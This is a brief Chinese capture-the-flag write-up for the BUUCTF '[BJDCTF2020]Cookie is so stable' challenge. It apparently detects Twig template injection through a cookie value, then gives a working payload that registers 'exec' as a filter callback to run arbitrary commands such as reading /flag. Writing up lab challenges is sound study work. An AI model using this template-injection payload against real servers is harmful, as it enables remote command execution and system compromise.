9.7 BUUCTF [BJDCTF2020]Cookie is so stable

与 ip那道题类似
用burpsuite抓包后发现 cookie一栏有 user 这个可控参数
构造

user={{2*3}}

发现回显为6 证明这个模板是 Twig注入
经尝试直接的 system 命令是不行的
Twig注入模板：

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

最后一个引号内填想要执行的cmd即可